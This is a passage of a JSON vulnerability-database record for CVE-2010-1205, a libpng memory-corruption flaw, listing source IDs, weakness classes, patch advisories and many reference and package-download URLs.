"db": "PACKETSTORM",
"id": "92097"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "PACKETSTORM",
"id": "92111"
},
{
"db": "PACKETSTORM",
"id": "92156"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"id": "VAR-201006-1188",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-43810"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:23:32.294000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "libpng Repair measures for memory corruption and denial of service vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126302"
},
{
"title": "Red Hat: Critical: seamonkey security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100546 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: CVE-2010-1205 and CVE-2010-2249",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=184c5adf52ad398a58919ac7993ba9b9"
},
{
"title": "Mozilla: Remote code execution using malformed PNG image",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=d846dfedec9f2e8b79ff9b299c65c005"
},
{
"title": "Debian Security Advisories: DSA-2072-1 libpng -- several vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=3e96a347c5dea429ac96a3e5e90fb285"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-960-1"
},
{
"title": "Red Hat: Critical: firefox security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100547 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: thunderbird vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-958-1"
},
{
"title": "Debian Security Advisories: DSA-2075-1 xulrunner -- several vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fa5c93137e44116ffb255e585f0961fc"
},
{
"title": "Ubuntu Security Notice: firefox, firefox-3.0, xulrunner-1.9.2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-957-1"
},
{
"title": "Ubuntu Security Notice: firefox, firefox-3.0, xulrunner-1.9.2 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-957-2"
},
{
"title": "Ubuntu Security Notice: firefox-3.0, firefox-3.5, xulrunner-1.9.2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-930-4"
},
{
"title": "Ubuntu Security Notice: ant, apturl, epiphany-browser, gluezilla, gnome-python-extras, liferea, mozvoikko, openjdk-6, packagekit, ubufox, webfav, yelp update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-930-5"
},
{
"title": "Exploit Development: Case Studies\nWindows\nUnix-like",
"trust": 0.1,
"url": "https://github.com/dyjakan/exploit-development-case-studies "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/sambacha/mirror-radamsa "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/StephenHaruna/RADAMSA "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/benoit-a/radamsa "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/g60ocR/radamsa "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/sunzu94/radamsa-Fuzzer "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/nqwang/radamsa "
},
{
"title": "A Crash Course to Radamsa\nFAQ",
"trust": 0.1,
"url": "https://github.com/Hwangtaewon/radamsa "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.1
},
{
"problemtype": "CWE-119",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=608238"
},
{
"trust": 1.9,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-41.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2010//aug/msg00003.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00003.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2011/mar/msg00000.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2011//mar/msg00004.html"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/41174"
},
{
"trust": 1.8,
"url": "http://blackberry.com/btsc/kb27244"
},
{
"trust": 1.8,
"url": "http://code.google.com/p/chromium/issues/detail?id=45983"
},
{
"trust": 1.8,
"url": "http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4312"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4435"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4456"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4457"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4554"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4566"
},
{
"trust": 1.8,
"url": "http://trac.webkit.org/changeset/61816"
},
{
"trust": 1.8,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 1.8,
"url": "http://www.vmware.com/security/advisories/vmsa-2010-0014.html"
},
{
"trust": 1.8,
"url": "https://bugs.webkit.org/show_bug.cgi?id=40798"
},
{
"trust": 1.8,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=570451"
},
{
"trust": 1.8,
"url": "http://www.debian.org/security/2010/dsa-2072"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-july/044283.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-july/044397.html"
},
{
"trust": 1.8,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:133"
},
{
"trust": 1.8,
"url": "http://lists.vmware.com/pipermail/security-announce/2010/000105.html"
},
{
"trust": 1.8,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11851"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40302"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40336"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40472"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/40547"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/41574"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/42314"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/42317"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-09/msg00006.html"
},
{
"trust": 1.8,
"url": "http://www.ubuntu.com/usn/usn-960-1"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1612"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1637"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1755"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1837"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1846"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1877"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/2491"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/3045"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/3046"
},
{
"trust": 1.8,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/59815"
},
{
"trust": 1.7,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2010\u0026m=slackware-security.613061"
},
{
"trust": 1.5,
"url": "http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng;a=commitdiff;h=188eb6b42602bf7d7ae708a21897923b6a83fe7c#patch18"
},
{
"trust": 1.1,
"url": "http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng%3ba=commitdiff%3bh=188eb6b42602bf7d7ae708a21897923b6a83fe7c#patch18"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
},
{
"trust": 0.8,
"url": "http://libpng.org/pub/png/libpng.html"
},
{
"trust": 0.8,
"url": "http://admin.fedoraproject.org/updates/libpng-1.2.44-1.fc13"
},
{
"trust": 0.8,
"url": "http://admin.fedoraproject.org/updates/libpng-1.2.44-1.fc12"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-has-been-identified-in-bigfix-platform-shipped-with-ibm-license-metric-tool-2/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48909"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0654"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2754"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2753"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1208"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1211"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2249"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2751"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1214"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "http://security.debian.org/"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.2,
"url": "http://packages.debian.org/\u003cpkg\u003e"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2741"
},
{
"trust": 0.2,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2741"
},
{
"trust": 0.2,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.2,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.2,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205"
},
{
"trust": 0.2,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1205"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2249"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-6218"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1206"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1207"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1209"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1212"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2752"
},
{
"trust": 0.2,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly.orig.tar.gz"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1213"
},
{
"trust": 0.1,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2010\u0026amp;m=slackware-security.613061"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2010:0546"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/92011/libpng-1.4.2-denial-of-service.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/960-1/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/14422/"
},
{
"trust": 0.1,
"url": "https://www.kb.cert.org/vuls/id/643615"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-40.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-38.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-42.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-39.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/gfx/pdf/secunia_half_year_report_2010.pdf"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-34.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-44.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40642/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-43.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-47.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-46.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/40642/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=40642"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.19-3_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0182"
},
{
"trust": 0.1,
